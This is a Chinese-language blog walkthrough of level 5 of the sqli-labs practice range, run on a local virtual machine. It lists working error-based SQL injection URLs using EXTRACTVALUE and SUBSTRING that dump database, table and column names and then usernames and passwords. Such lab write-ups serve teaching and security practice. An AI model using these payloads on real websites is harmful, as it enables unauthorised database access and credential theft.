sqli-labs靶场第五关less-5

sqli-labs less-5

本次测试由虚拟机搭建靶场,主机浏览器中基于hackbar插件进行测试

1、确定注入点及注入类型

输入:

http://192.168.128.3/sq/Less-5/?id=1

http://192.168.128.3/sq/Less-5/?id=2

发现页面回显都一致,

输入

http://192.168.128.3/sq/Less-5/?id=1'

页面回显报错

从报错判断多了个 ' ,确定闭合为*' '* ,

2、确定列数

输入

http://192.168.128.3/sq/Less-5/?id=1' order by 5--+

http://192.168.128.3/sq/Less-5/?id=1' order by 4--+

http://192.168.128.3/sq/Less-5/?id=1' order by 3--+

发现5,4都报错,3的时候页面回显与之前一致,确定由三列

3、确定回显位

http://192.168.128.3/sq/Less-5/?id=1' union select 1,2,3--+

无回显,结合前面出现的单引号与确定列数页面出现报错可判断出,此关可使用报错注入

本次我使用 EXTRACTVALUE() 函数进行报错注入。

函数原型

EXTRACTVALUE(xml_data, xpath_expression)

extractvalue()函数原理可参考我写的另外一篇文章
报错注入函数基础知识详解

或者另外一位博主讲的:sql注入之报错注入

使用报错注入确定回显

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,(select database()))),3--+

  • 0x7e转码后为 ~ ,加入~目的是为了让后面的路径故意报错

使用了extractvalue函数,将xml数据设置为1,xpath_expression部分设置为concat(0x7e,(select database())

此时的xpath_expression为"~数据库名",由于1中并没有"~数据库名"因此会产生报错,可以从报错结果中看到我们想要的数据库名

故此查询到数据库名

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,(select version()))),3--+

  • 版本名

3、爆出所有数据库名

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata))),3--+

**由此爆出了数据库名,但是由于此报错注入一次返回的字符只能由32位,这时我们可以借助substring函数

例如:select substring(123456,1,3);

输出 123

于是我们可以使用

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(schema_name) from information_schema.schemata)),1,30))),3--+

来显示从第一个字符开始的前三十个,然后使用

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(schema_name) from information_schema.schemata)),30,30))),3--+

发现还没有显示完全,接着

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(schema_name) from information_schema.schemata)),60,30))),3--+

显示完整,三次报错显示结果如下:

得到完整的数据库

4、爆出security的所有表名

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(table_name) from information_schema.tables where table_schema=database())),1,30))),3--+

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(table_name) from information_schema.tables where table_schema=database())),30,30))),3--+

得到想要的表名 users

5、爆出列名

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),1,30))),3--+

6、爆出数据

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(username,' ',password) from security.users)),1,30))),3--+

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(username,' ',password) from security.users)),30,30))),3--+

剩下数据显示出来与上面同理
至此,大功告成

相关推荐
十一吖i1 天前
vue3表格显示隐藏列全屏拖动功能
前端·javascript·vue.js
冰暮流星1 天前
css之线性渐变
前端·css
徐同保1 天前
tailwindcss暗色主题切换
开发语言·前端·javascript
mapbar_front1 天前
大厂精英为何在中小公司水土不服?
前端
生莫甲鲁浪戴1 天前
Android Studio新手开发第二十七天
前端·javascript·android studio
清风6666661 天前
基于单片机的水塔液位检测与智能调节报警系统设计
数据库·单片机·嵌入式硬件·毕业设计·课程设计·期末大作业
gplitems1231 天前
Technox – IT Solutions & Services WordPress Theme: A Practical
linux·服务器·数据库
恒拓高科WorkPlus1 天前
构建企业数字化办公核心:安全高效的内网im私有化协同平台
安全
不剪发的Tony老师1 天前
MySQL 9.5创新版发布,有哪些新功能?
数据库·mysql
布朗克1681 天前
MySQL 及 SQL 注入详细说明
数据库·sql·mysql·1024程序员节